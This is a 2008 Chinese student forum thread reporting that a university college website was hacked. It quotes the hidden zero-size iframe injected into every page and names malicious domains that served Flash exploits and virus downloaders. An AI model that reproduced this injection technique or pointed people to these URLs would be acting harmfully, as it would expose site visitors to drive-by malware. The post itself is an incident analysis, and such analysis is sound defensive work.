再次对学校网管的安全意识没想法

kucoolzhu · 发表于 2008-9-4 21:31

(以下红色部分请勿轻易点击,否则后果自负)

浙科院机械学院网站 http://jdx.zust.edu.cn 被黑客入侵

网站内所有网页文件(ASP,HTM,HTML....)的末尾被添加了一句代码:

<iframe src=http://%61%76%65%31%2E%63%6 width=0 height=0></iframe>(意思是加载一个宽度和高度都为0也就是看不到的网页,最常用的挂马方式之一)

继续追查得到的信息:

http://%61%76%65%31%2E%63%6解析后的地址为http://ave1.cn

此网站中用iframe加载了另外两个恶意页面(见图一)

http://jzm015.cn/ilink.html能自动检测机器的Flash Player的版本然后利用各版本的漏洞加载不同的恶意SWF文件(见图二)

http://www.hxg006.cn/b2.htm 中包含一个加密的1936348.js和一个加密的fxx.htm ,作用是下载并执行病毒和跳转到新的恶意网站

很流行的手段,没必要继续看下去了

再次没想法.....彻底失望....%@24

网站里的所有恶意代码我已经删了,现在可以安全访问了...

左手无名指 · 发表于 2008-9-4 21:31

lz是？？好像很牛X的~%@28

小熊喂你 · 发表于 2008-9-4 21:32

LZqiang da

小熊寶寶 · 发表于 2008-9-4 21:32

小猪又被你发现了，好像不是第一次，了,N次了都%@24

金澜 · 发表于 2008-9-4 21:32

%@15 看不懂。。。
但LZ好像很厉害的样子

kucoolzhu · 发表于 2008-9-4 21:32

原帖由 左手无名指 于 2008-9-4 21:31 发表
lz是？？好像很牛X的~%@28

大二机械的%@07

左手无名指 · 发表于 2008-9-4 21:33

酷酷猪，名字真酷~%@101

kucoolzhu · 发表于 2008-9-4 21:34

原帖由 小熊寶寶 于 2008-9-4 21:32 发表
小猪又被你发现了，好像不是第一次，了,N次了都%@24

才两次...不过学校犯的都是很低级的毛病..所以很不爽...

kucoolzhu · 发表于 2008-9-4 21:34

MS图片不能显示??

左手无名指 · 发表于 2008-9-4 21:34

原帖由 kucoolzhu 于 2008-9-4 21:32 发表

大二机械的%@07

对你有印象了，以前在挖坟是看到你的帖~~%@07

kucoolzhu · 发表于 2008-9-4 21:35

原帖由 左手无名指 于 2008-9-4 21:34 发表
对你有印象了，以前在挖坟是看到你的帖~~%@07

版主带头挖坟...%@15

左手无名指 · 发表于 2008-9-4 21:36

原帖由 kucoolzhu 于 2008-9-4 21:35 发表

版主带头挖坟...%@15

那是以前的事，嘘，不要张扬出去~~%@52

卷轴玩笑 · 发表于 2008-9-4 21:37

很强大基本看不懂~

小熊寶寶 · 发表于 2008-9-4 21:38

原帖由 kucoolzhu 于 2008-9-4 21:32 发表

大二机械的%@07

高数23分，想去计算机的那个%@08

kucoolzhu · 发表于 2008-9-4 21:38

原帖由 左手无名指 于 2008-9-4 21:36 发表
那是以前的事，嘘，不要张扬出去~~%@52

百度贴吧见过某人在07年把自己05年的坟挖出来还说,我以前也有过类似楼主的疑问...

帐号		自动登录	找回密码
密码			会员注册

再次对学校网管的安全意识没想法

相关帖子